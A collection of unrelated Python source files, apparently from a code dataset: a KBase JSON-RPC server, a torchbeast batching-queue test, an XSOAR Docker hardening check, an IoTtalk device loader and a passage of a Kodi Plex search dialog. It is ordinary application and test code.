submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_functional_enrichment_1.run_fe1,
name='kb_functional_enrichment_1.run_fe1',
types=[dict])
self.method_authentication['kb_functional_enrichment_1.run_fe1'] = 'required' # noqa
self.rpc_service.add(impl_kb_functional_enrichment_1.status,
name='kb_functional_enrichment_1.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_functional_enrichment_1 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
batching_queue_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for actorpool.BatchingQueue.
Basic functionalities actorpool.BatchingQueue are tested
in libtorchbeast/actorpool_test.cc.
"""
import threading
import time
import unittest
import numpy as np
import torch
import libtorchbeast
class BatchingQueueTest(unittest.TestCase):
def test_bad_construct(self):
with self.assertRaisesRegex(ValueError, "Min batch size must be >= 1"):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=0, maximum_batch_size=1
)
with self.assertRaisesRegex(
ValueError, "Max batch size must be >= min batch size"
):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=1, maximum_batch_size=0
)
def test_multiple_close_calls(self):
queue = libtorchbeast.BatchingQueue()
queue.close()
with self.assertRaisesRegex(RuntimeError, "Queue was closed already"):
queue.close()
def test_check_inputs(self):
queue = libtorchbeast.BatchingQueue(batch_dim=2)
with self.assertRaisesRegex(
ValueError, "Enqueued tensors must have more than batch_dim =="
):
queue.enqueue(torch.ones(5))
with self.assertRaisesRegex(
ValueError, "Cannot enqueue empty vector of tensors"
):
queue.enqueue([])
with self.assertRaisesRegex(
libtorchbeast.ClosedBatchingQueue, "Enqueue to closed queue"
):
queue.close()
queue.enqueue(torch.ones(1, 1, 1))
def test_simple_run(self):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=1, maximum_batch_size=1
)
inputs = torch.zeros(1, 2, 3)
queue.enqueue(inputs)
batch = next(queue)
np.testing.assert_array_equal(batch, inputs)
def test_batched_run(self, batch_size=2):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=batch_size, maximum_batch_size=batch_size
)
inputs = [torch.full((1, 2, 3), i) for i in range(batch_size)]
def enqueue_target(i):
while queue.size() < i:
# Make sure thread i calls enqueue before thread i + 1.
time.sleep(0.05)
queue.enqueue(inputs[i])
enqueue_threads = []
for i in range(batch_size):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
for t in enqueue_threads:
t.start()
batch = next(queue)
np.testing.assert_array_equal(batch, torch.cat(inputs))
for t in enqueue_threads:
t.join()
class BatchingQueueProducerConsumerTest(unittest.TestCase):
def test_many_consumers(
self, enqueue_threads_number=16, repeats=100, dequeue_threads_number=64
):
queue = libtorchbeast.BatchingQueue(batch_dim=0)
lock = threading.Lock()
total_batches_consumed = 0
def enqueue_target(i):
for _ in range(repeats):
queue.enqueue(torch.full((1, 2, 3), i))
def dequeue_target():
nonlocal total_batches_consumed
for batch in queue:
batch_size, *_ = batch.shape
with lock:
total_batches_consumed += batch_size
enqueue_threads = []
for i in range(enqueue_threads_number):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
dequeue_threads = []
for i in range(dequeue_threads_number):
dequeue_threads.append(
threading.Thread(target=dequeue_target, name=f"dequeue-thread-{i}")
)
for t in enqueue_threads + dequeue_threads:
t.start()
for t in enqueue_threads:
t.join()
queue.close()
for t in dequeue_threads:
t.join()
self.assertEqual(total_batches_consumed, repeats * enqueue_threads_number)
if __name__ == "__main__":
unittest.main()
|
DockerHardeningCheck.py
|
import demistomock as demisto
from CommonServerPython import *
from multiprocessing import Process
import resource
import re
import time
def big_string(size):
s = 'a' * 1024
while len(s) < size:
s = s * 2
return len(s)
def mem_size_to_bytes(mem: str) -> int:
res = re.match(r'(\d+)\s*([gm])?b?', mem, re.IGNORECASE)
if not res:
raise ValueError("Failed parsing memory string: {}".format(mem))
b = int(res.group(1))
if res.group(2):
b = b * 1024 * 1024 # convert to mega byte
if res.group(2).lower() == 'g':
b = b * 1024 # convert to giga
return b
def check_memory(target_mem: str, check_type: str) -> str:
"""Check allocating memory
Arguments:
target_mem {str} -- target memory size. Can specify as 1g 1m and so on
check_type {str} -- How to check either: cgroup (check configuration of cgroup) or allocate (check actual allocation)
Returns:
str -- error string if failed
"""
size = mem_size_to_bytes(target_mem)
if check_type == "allocation":
LOG("starting process to check memory of size: {}".format(size))
p = Process(target=big_string, args=(size, ))
p.start()
p.join()
LOG("memory intensive process status code: {}".format(p.exitcode))
if p.exitcode == 0:
return ("Succeeded allocating memory of size: {}. "
"It seems that you haven't limited the available memory to the docker container.".format(target_mem))
else:
cgroup_file = "/sys/fs/cgroup/memory/memory.limit_in_bytes"
try:
with open(cgroup_file, "r") as f:
mem_bytes = int(f.read().strip())
if mem_bytes > size:
return (f'According to memory cgroup configuration at: {cgroup_file}'
f' available memory in bytes [{mem_bytes}] is larger than {target_mem}')
except Exception as ex:
return (f'Failed reading memory cgroup from: {cgroup_file}. Err: {ex}.'
' You may be running a docker version which does not provide this configuration information.'
' You can try running the memory check with memory_check=allocate as an alternative.')
return ""
def check_pids(pid_num: int) -> str:
LOG("Starting pid check for: {}".format(pid_num))
processes = [Process(target=time.sleep, args=(30, )) for i in range(pid_num)]
try:
for p in processes:
p.start()
time.sleep(0.5)
alive = 0
for p in processes:
if p.is_alive():
alive += 1
if alive >= pid_num:
return ("Succeeded creating processs of size: {}. "
"It seems that you haven't limited the available pids to the docker container.".format(pid_num))
else:
LOG(f'Number of processes that are alive: {alive} is smaller than {pid_num}. All good.')
except Exception as ex:
LOG("Pool startup failed (as expected): {}".format(ex))
finally:
for p in processes:
if p.is_alive():
p.terminate()
p.join()
return ""
def check_fd_limits(soft, hard) -> str:
s, h = resource.getrlimit(resource.RLIMIT_NOFILE)
if s > soft:
return "FD soft limit: {} is above desired limt: {}.".format(s, soft)
if h > hard:
return "FD hard limit: {} is above desired limit: {}.".format(h, hard)
return ""
def check_non_root():
uid = os.getuid()
if uid == 0:
return ("Running as root with uid: {}."
" It seems that you haven't set the docker container to run with a non-root internal user.".format(uid))
return ""
def intensive_calc(iter: int):
i = 0
x = 1
while i < iter:
x = x * 2
i += 1
return x
def check_cpus(num_cpus: int) -> str:
iterval = 500 * 1000
processes = [Process(target=intensive_calc, args=(iterval, )) for i in range(num_cpus)]
start = time.time_ns()
for p in processes:
p.start()
for p in processes:
p.join()
runtime = time.time_ns() - start
LOG("cpus check runtime for {} processes time: {}".format(num_cpus, runtime))
processes = [Process(target=intensive_calc, args=(iterval, )) for i in range(num_cpus * 2)]
start = time.time_ns()
for p in processes:
p.start()
for p in processes:
p.join()
runtime2 = time.time_ns() - start
# runtime 2 should be 2 times slower. But we give it a safty as the machine itself maybe loaded
LOG("cpus check runtime for {} processes time: {}".format(num_cpus * 2, runtime2))
if runtime2 < runtime * 1.5:
return ("CPU processing power increased significantly when increasing processes "
"from: {} (time: {}) to: {} (time: {}). "
"Note: this test may fail even if the proper configuration has been applied and"
" the machine itself is loaded.".format(num_cpus, runtime, num_cpus * 2, runtime2))
return ""
def main():
mem = demisto.args().get('memory', "1g")
mem_check = demisto.args().get('memory_check', "cgroup")
pids = int(demisto.args().get('pids', 256))
fds_soft = int(demisto.args().get('fds_soft', 1024))
fds_hard = int(demisto.args().get('fds_hard', 8192))
cpus = int(demisto.args().get('cpus', 1))
success = "Success"
check = "Check"
status = "Status"
res = [
{
check: "Non-root User",
status: check_non_root() or success,
},
{
check: "Memory",
status: check_memory(mem, mem_check) or success,
},
{
check: "File Descriptors",
status: check_fd_limits(fds_soft, fds_hard) or success,
},
{
check: "CPUs",
status: check_cpus(cpus) or success,
},
{
check: "PIDs",
status: check_pids(pids) or success,
},
]
failed = False
failed_msg = ''
for v in res:
if v[status] != success:
failed = True
v[status] = "Failed: " + v[status]
failed_msg += f'* {v[status]}\n'
table = tableToMarkdown("Docker Hardening Results Check", res, [check, status])
return_outputs(table)
if failed:
return_error(f'Failed verifying docker hardening:\n{failed_msg}'
'More details at: https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-0/cortex-xsoar-admin/docker/docker-hardening-guide.html') # noqa
# python2 uses __builtin__ python3 uses builtins
if __name__ == "__builtin__" or __name__ == "builtins":
main()
|
dai.py
|
import atexit
import logging
import os.path
import platform
import re
import signal
import sys
import time
from threading import Thread, Event
from uuid import UUID
from iottalkpy.color import DAIColor
from iottalkpy.dan import DeviceFeature, RegistrationError, NoData
from iottalkpy.dan import register, push, deregister
from iottalkpy.utils import cd
log = logging.getLogger(DAIColor.wrap(DAIColor.logger, 'DAI'))
log.setLevel(level=logging.INFO)
_flags = {}
_devices = {}
_interval = {}
try: # Python 3 only
import importlib
import importlib.util
except ImportError:
pass
def push_data(df_name):
if not _devices[df_name].push_data:
return
log.debug('%s:%s', df_name, _flags[df_name])
while _flags[df_name]:
_data = _devices[df_name].push_data()
if not isinstance(_data, NoData) and _data is not NoData:
push(df_name, _data)
time.sleep(_interval[df_name])
def on_signal(signal, df_list):
global _flags
log.info('Receive signal: \033[1;33m%s\033[0m, %s', signal, df_list)
if 'CONNECT' == signal:
for df_name in df_list:
if not _flags.get(df_name):
_flags[df_name] = True
t = Thread(target=push_data, args=(df_name,))
t.daemon = True
t.start()
elif 'DISCONNECT' == signal:
for df_name in df_list:
_flags[df_name] = False
elif 'SUSPEND' == signal:
# Not use
pass
elif 'RESUME' == signal:
# Not use
pass
return True
def get_df_function_name(df_name):
return re.sub(r'-O$', '_O', re.sub(r'-I$', '_I', df_name))
def on_data(df_name, data):
_devices[df_name].on_data(data)
return True
def exit_handler(signal, frame):
sys.exit(0) # this will trigger ``atexit`` callbacks
def _get_device_addr(app):
"""
:return: ``str`` or ``None``
"""
addr = app.__dict__.get('device_addr', None)
if addr is None:
return
if isinstance(addr, UUID):
return str(addr)
try:
UUID(addr)
except ValueError:
try:
addr = str(UUID(int=int(addr, 16)))
except ValueError:
log.warning('Invalid device_addr. Change device_addr to None.')
addr = None
return addr
def _get_persistent_binding(app, device_addr):
"""
:return: bool
"""
x = app.__dict__.get('persistent_binding', False)
if x and device_addr is None:
msg = ('In case of `persistent_binding` set to `True`, '
'the `device_addr` should be set and fixed.')
raise ValueError(msg)
return x
def main(app):
global _devices, _interval
csmapi = app.__dict__.get('api_url')
if csmapi is None:
raise RegistrationError('api_url is required')
device_name = app.__dict__.get('device_name')
if device_name is None:
pass
# raise RegistrationError('device_name not given.')
device_model = app.__dict__.get('device_model')
if device_model is None:
raise RegistrationError('device_model not given.')
device_addr = _get_device_addr(app)
persistent_binding = _get_persistent_binding(app, device_addr)
# callbacks
register_callback = app.__dict__.get('register_callback')
on_register = app.__dict__.get('on_register')
on_deregister = app.__dict__.get('on_deregister')
on_connect = app.__dict__.get('on_connect')
on_disconnect = app.__dict__.get('on_disconnect')
idfs = app.__dict__.get('idf_list', [])
odfs = app.__dict__.get('odf_list', [])
username = app.__dict__.get('username')
extra_setup_webpage = app.__dict__.get('extra_setup_webpage', '')
device_webpage = app.__dict__.get('device_webpage', '')
_push_interval = app.__dict__.get('push_interval', 1)
_interval = app.__dict__.get('interval', {})
if not idfs and not odfs:
raise RegistrationError('Neither idf_list nor odf_list is empty.')
idf_list = []
for df_profile in idfs:
if isinstance(df_profile, str):
_devices[df_profile] = DeviceFeature(df_name=df_profile)
_devices[df_profile].push_data = app.__dict__.get(get_df_function_name(df_profile))
idf_list.append(_devices[df_profile].profile())
# check push data interval
if not _interval.get(df_profile):
_interval[df_profile] = _push_interval
elif isinstance(df_profile, tuple) and len(df_profile) == 2:
_devices[df_profile[0]] = DeviceFeature(df_name=df_profile[0],
df_type=df_profile[1])
_devices[df_profile[0]].push_data = app.__dict__.get(get_df_function_name(df_profile[0]))
idf_list.append(_devices[df_profile[0]].profile())
# check push data interval
if not _interval.get(df_profile[0]):
_interval[df_profile[0]] = _push_interval
else:
raise RegistrationError('unknown idf_list, usage: [df_name, ...]')
odf_list = []
for df_profile in odfs:
if isinstance(df_profile, str):
_devices[df_profile] = DeviceFeature(df_name=df_profile)
_devices[df_profile].on_data = app.__dict__.get(get_df_function_name(df_profile))
odf_list.append(_devices[df_profile].profile())
elif isinstance(df_profile, tuple) and len(df_profile) == 2:
_devices[df_profile[0]] = DeviceFeature(df_name=df_profile[0],
df_type=df_profile[1])
_devices[df_profile[0]].on_data = app.__dict__.get(get_df_function_name(df_profile[0]))
odf_list.append(_devices[df_profile[0]].profile())
else:
raise RegistrationError('unknown odf_list, usage: [df_name, ...]')
def f():
global _flags
for key in _flags:
_flags[key] = False
log.debug('on_disconnect: _flag = %s', str(_flags))
if on_disconnect:
return on_disconnect()
context = register(
csmapi,
on_signal=on_signal,
on_data=on_data,
accept_protos=['mqtt'],
id_=device_addr,
idf_list=idf_list,
odf_list=odf_list,
name=device_name,
profile={
'model': device_model,
'u_name': username,
'extra_setup_webpage': extra_setup_webpage,
'device_webpage': device_webpage,
},
register_callback=register_callback,
on_register=on_register,
on_deregister=on_deregister,
on_connect=on_connect,
on_disconnect=f
)
if not persistent_binding:
atexit.register(deregister)
signal.signal(signal.SIGTERM, exit_handler)
signal.signal(signal.SIGINT, exit_handler)
log.info('Press Ctrl+C to exit DAI.')
if platform.system() == 'Windows' or sys.version_info.major == 2:
# workaround for https://bugs.python.org/issue35935
while True:
time.sleep(86400)
else:
Event().wait() # wait for SIGINT
def load_module(fname):
if sys.version_info.major > 2: # python 3+
if fname.endswith('.py'):
# https://stackoverflow.com/a/67692
if sys.version_info >= (3, 5):
spec = importlib.util.spec_from_file_location('ida', fname)
ida = importlib.util.module_from_spec(spec)
spec.loader.exec_module(ida)
else: # case of python 3.4
# this import only for python 3.4-
from importlib.machinery import SourceFileLoader
ida = SourceFileLoader('ida', fname).load_module()
else:
fname = os.path.normpath(fname)
m = fname[1:] if fname.startswith('/') else fname
# mapping ``my/path/ida`` to ``my.path.ida``
m = '.'.join(m.split(os.path.sep))
# well, seems we need to hack sys.path
if fname.startswith('/'):
with cd('/'):
sys.path.append(os.getcwd())
ida = importlib.import_module(m, )
else:
sys.path.append(os.getcwd())
ida = importlib.import_module(m)
sys.path.pop()
return ida
else: # in case of python 2, only single file is supported
if os.path.isdir(fname):
raise RuntimeError(
"Only single file loading is supported in Python 2")
class App(object):
def __init__(self, d):
self.__dict__ = d
d = {}
with open(fname) as f:
exec(f, d)
return App(d)
if __name__ == '__main__':
main(load_module(sys.argv[1] if len(sys.argv) > 1 else 'ida'))
|
search.py
|
import time
import threading
import xbmcgui
import kodigui
import opener
import windowutils
from lib import util
from lib.kodijsonrpc import rpc
from plexnet import plexapp
class SearchDialog(kodigui.BaseDialog, windowutils.UtilMixin):
xmlFile = 'script-plex-search.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
res = '1080i'
width = 1920
height = 1080
LETTERS = 'abcdefghijklmnopqrstuvwxyz0123456789 '
SECTION_BUTTONS = {
901: 'all',
902: 'movie',
903: 'show',
904: 'artist',
905: 'photo'
}
HUB_POSTER_00 = 2100
HUB_SQUARE_01 = 2101
HUB_AR16X9_02 = 2102
HUB_CIRCLE_03 = 2103
HUB_POSTER_04 = 2104
HUB_SQUARE_05 = 2105
HUB_AR16X9_06 = 2106
HUB_CIRCLE_07 = 2107
HUB_POSTER_08 = 2108
HUB_SQUARE_09 = 2109
HUB_AR16X9_10 = 2110
HUB_CIRCLE_11 = 2111
HUB_POSTER_12 = 2112
HUB_SQUARE_13 = 2113
HUB_AR16X9_14 = 2114
HUB_CIRCLE_15 = 2115
HUB_POSTER_16 = 2116
HUB_SQUARE_17 = 2117
HUB_AR16X9_18 = 2118
HUB_CIRCLE_19 = 2119
HUB_POSTER_20 = 2120
HUB_SQUARE_21 = 2121
HUB_AR16X9_22 = 2122
HUB_CIRCLE_23 = 2123
HUB_POSTER_24 = 2124
HUB_SQUARE_25 = 2125
HUB_AR16X9_26 = 2126
HUB_CIRCLE_27 = 2127
HUB_POSTER_28 = 2128
HUB_SQUARE_29 = 2129
HUB_AR16X9_30 = 2130
HUB_CIRCLE_31 = 2131
HUB_POSTER_32 = 2132
HUB_SQUARE_33 = 2133
HUB_AR16X9_34 = 2134
HUB_CIRCLE_35 = 2135
HUB_POSTER_36 = 2136
HUB_SQUARE_37 = 2137
HUB_AR16X9_38 = 2138
HUB_CIRCLE_39 = 2139
HUB_POSTER_40 = 2140
HUB_SQUARE_41 = 2141
HUB_AR16X9_42 = 2142
HUB_CIRCLE_43 = 2143
HUB_POSTER_44 = 2144
HUB_SQUARE_45 = 2145
HUB_AR16X9_46 = 2146
HUB_CIRCLE_47 = 2147
HUBMAP = {
'track': {'type': 'square'},
'episode': {'type': 'ar16x9'},
'movie': {'type': 'poster'},
'show': {'type': 'poster'},
'artist': {'type': 'square'},
'album': {'type': 'square'},
'photoalbum': {'type': 'square'},
'photo': {'type': 'square'},
'actor': {'type': 'circle'},
'director': {'type': 'circle'},
'genre': {'type': 'circle'},
'playlist': {'type': 'square'},
}
SECTION_TYPE_MAP = {
'1': {'thumb': 'script.plexodus/section_type/movie.png'}, # Movie
'2': {'thumb': 'script.plexodus/section_type/show.png'}, # Show
'3': {'thumb': 'script.plexodus/section_type/show.png'}, # Season
'4': {'thumb': 'script.plexodus/section_type/show.png'}, # Episode
'8': {'thumb': 'script.plexodus/section_type/music.png'}, # Artist
'9': {'thumb': 'script.plexodus/section_type/music.png'}, # Album
'10': {'thumb': 'script.plexodus/section_type/music.png'}, # Track
}
def __init__(self, *args, **kwargs):
kodigui.BaseDialog.__init__(self, *args, **kwargs)
windowutils.UtilMixin.__init__(self)
self.parentWindow = kwargs.get('parent_window')
self.sectionID = kwargs.get('section_id')
self.resultsThread = None
self.updateResultsTimeout = 0
self.isActive = True
def onFirstInit(self):
self.hubControls = (
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_00, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_01, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_02, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_03, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_04, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_05, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_06, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_07, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_08, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_09, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_10, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_11, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_12, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_13, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_14, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_15, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_16, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_17, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_18, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_19, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_20, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_21, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_22, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_23, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_24, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_25, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_26, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_27, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_28, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_29, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_30, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_31, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_32, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_33, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_34, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_35, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_36, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_37, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_38, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_39, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_40, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_41, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_42, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_43, 5)
},
{
'poster': kodigui.ManagedControlList(self, self.HUB_POSTER_44, 5),
'square': kodigui.ManagedControlList(self, self.HUB_SQUARE_45, 5),
'ar16x9': kodigui.ManagedControlList(self, self.HUB_AR16X9_46, 5),
'circle': kodigui.ManagedControlList(self, self.HUB_CIRCLE_47, 5)
},
)
self.edit = kodigui.SafeControlEdit(650, 651, self, key_callback=self.updateFromEdit, grab_focus=True)
self.edit.setCompatibleMode(rpc.Application.GetProperties(properties=["version"])["major"] < 17)
self.setProperty('search.section', 'all')
self.updateQuery()
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.isActive = False
except:
util.ERROR()
kodigui.BaseDialog.onAction(self, action)
def onClick(self, controlID):
if 1000 < controlID < 1037:
self.letterClicked(controlID)
elif controlID in self.SECTION_BUTTONS:
self.sectionClicked(controlID)
elif controlID == 951:
self.deleteClicked()
elif controlID == 952:
self.letterClicked(1037)
elif controlID == 953:
self.clearClicked()
elif 2099 < controlID < 2200:
